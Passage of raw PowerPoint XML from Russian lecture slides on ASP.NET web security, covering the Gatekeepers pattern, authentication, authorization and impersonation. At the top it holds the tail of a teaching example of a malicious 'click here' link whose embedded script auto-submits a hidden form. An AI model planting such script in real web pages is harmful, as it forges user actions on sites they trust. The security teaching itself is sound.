              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>badForm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>SCRIPT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>&gt; &gt; Щелкни здесь! &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>&gt;.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="18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706437"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" smtClean="0"/>
              <a:t>Шаблон приложения </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="3200" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" smtClean="0"/>
              <a:t>«Превратники» - «</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" b="1" smtClean="0"/>
              <a:t>Gatekeepers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" smtClean="0"/>
              <a:t>»</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20483" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395288" y="1341438"/>
            <a:ext cx="8291512" cy="2232025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>«</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" smtClean="0"/>
              <a:t>Gatekeepers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>» это концептуальный шаблон, который применяется к модели конвейерной архитектуры для инфраструктуры безопасности.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Данная модель предполагает, что безопасное приложение всегда имеет больше механизмов обеспечения безопасности, чем это необходимо. Каждый из этих механизмов реализуется в виде привратника (gatekeeper), который ответственен за обеспечение некоторый действий по поддержке безопасности.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Если один из привратников не отловит угрозу, злоумышленник будет сталкиваться со следующим привратником в конвейерной архитектуре. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20484" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect l="7927" t="43098" r="15300" b="17513"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="539750" y="3716338"/>
            <a:ext cx="7488238" cy="2881312"/>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Заголовок 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>Стандартные сервисы </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>приложений</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Содержимое 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1714500"/>
            <a:ext cx="8229600" cy="4411663"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Сервисы это некоторые операции (услуги), которые выполняются приложением.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Стандартные сервисы:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Аутентификация</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>процесс распознавания пользователя</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>как убедиться, что это тот пользователь, который описан в БД</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Управление учетными записями (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Membership</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>) – процесс хранения и изменения учетных записей пользователей.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Роли – возможность группировки пользователей по предоставляемым им правам.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Авторизация – предоставление (или отказ) пользователям права работать с разными ресурсами (страницами, документами, …) приложения.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Профили пользователей (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>profile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>, запоминание информации пользователей).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Шифрование (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Criptography</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>….</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>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633412"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="3600" smtClean="0"/>
              <a:t>Базовые задачи безопасности</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21507" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468313" y="1196975"/>
            <a:ext cx="8229600" cy="5400675"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" b="1" smtClean="0"/>
              <a:t>Аутентификация</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" b="1" smtClean="0"/>
              <a:t>Authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>) – определение того, кто пытается работать с приложением (какой пользователь).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" b="1" smtClean="0"/>
              <a:t>Авторизация </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" b="1" smtClean="0"/>
              <a:t>Authorization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>) – определение того, какие операции данному пользователю разрешено выполнять и какие ресурсы ему доступны.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" b="1" smtClean="0"/>
              <a:t>Конфиденциальность</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" b="1" smtClean="0"/>
              <a:t>Confidentiality</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>) – пока пользователь работает с приложением, необходимо гарантировать, что никто другой не способен видеть важные данные, которые обрабатываются пользователем. Для этого необходимо шифровать канал между браузером пользователя и </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>сервером. Более того возможно надо шифровать данные хранимые на стороне сервера (или куки на стороне пользователя), если требуется защитить данные от доступа к ним администратора БД и других сотрудников</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>компании провайдера.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" b="1" smtClean="0"/>
              <a:t>Целостность</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" b="1" smtClean="0"/>
              <a:t>Integrity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>) – и, наконец, нужно гарантировать, что данные передаваемые между пользователем и сервером не изменяются не авторизованными лицами. Цифровая подпись предоставляет возможность облегчить такой тип угрозы безопасности.</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sz="3600" smtClean="0"/>
              <a:t>Поддержка безопасности в </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" smtClean="0"/>
              <a:t>ASP.Net</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3600" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22531" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" smtClean="0"/>
              <a:t>ASP.NET включает базовую инфраструктуру для выполнения аутентификации и авторизации</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" smtClean="0"/>
              <a:t>Базовая библиотека классов .NET Framework включает набор классов пространства имен System.Security для шифрования и подписывания данных</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" smtClean="0"/>
              <a:t>SSL является стандартным способом гарантирующим конфиденциальность и целостность данных, передаваемых между браузером клиента и web сервером. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="28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188913"/>
            <a:ext cx="8229600" cy="706437"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000" smtClean="0"/>
              <a:t>Аутентификация</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23555" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395288" y="981075"/>
            <a:ext cx="8291512" cy="5876925"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>Процесс определения подлинности пользователя и гарантирования достоверности этой подлинности. Данный процесс аналогичен проверке бумажного паспорта</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>пользователя.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>После проверки идентичности пользователю выдается некоторый талон, который подтверждает прохождение им проверки (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>identity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>) (например, посадочный талон в аэропорту)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>В </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>ASP.Net </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>приложении аутентификация реализуется с помощью одной из следующих систем:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" smtClean="0"/>
              <a:t>Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" smtClean="0"/>
              <a:t>аутентификация</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" smtClean="0"/>
              <a:t>Forms </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" smtClean="0"/>
              <a:t>аутентификация</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" smtClean="0"/>
              <a:t>Pasport </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" smtClean="0"/>
              <a:t>аутентификация</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" smtClean="0"/>
              <a:t>Специальный (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" smtClean="0"/>
              <a:t>custom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" smtClean="0"/>
              <a:t>) процесс аутентификации</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>В каждой из этих систем пользователь предоставляет свои верительные данные при входе в систему.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>Под подлинностью</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t> (identity)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t> пользователя понимается разное в разных системах идентификации. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" smtClean="0"/>
              <a:t>Например, в </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" smtClean="0"/>
              <a:t>Windows OC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" smtClean="0"/>
              <a:t>используется 96 – битное число, называемое </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" smtClean="0"/>
              <a:t>SID (security ID)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" smtClean="0"/>
              <a:t>, для идентификации каждого подключенного пользователя.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>В </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>ASP.Net Forms </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>аутентификации пользователю дается аутентификационный билет, который является комбинацией значений зашифрованных и записанных в куки.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>Все, что делает аутентификация, это позволяет приложению определить, кто является пользователем в каждом запросе. Это хорошо использовать для процессов персонализации (personalization) и настройки (customization), так как можно использовать информацию о подлинности для передачи специфических для пользователя сообщений на </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>странице, изменять оформление страниц, добавлять содержание на странице с учетом предпочтений пользователей и т.п.</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633412"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" smtClean="0"/>
              <a:t>Имперсонификация </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="3200" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" smtClean="0"/>
              <a:t>(перевоплощение, Impersonation)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24579" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1341438"/>
            <a:ext cx="8229600" cy="4784725"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Это процесс выполнения кода от лица другого пользователя (в контексте подлинности (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>identity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>другого пользователя).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>По умолчанию весь </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>ASP.Net </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>код выполняется с использованием фиксированного специфической для данного компьютера учетной записи (account). Обычно это ASPNET для IIS 5.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" i="1" smtClean="0"/>
              <a:t>x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>или Network Service для IIS 6.0 и IIS 7.0.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Для выполнения кода с использованием другой identity, можно использовать встроенные возможности имперсонификации </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>ASP.Net. </a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Можно использовать имеющийся в системе </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>identity </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>пользователя, если данный пользователь уже был аутентифицирован с помощью учетной записи </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Windows.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Можно использовать имперсонификацию по двум причинам:</a:t>
            </a:r>
          </a:p>
          <a:p>
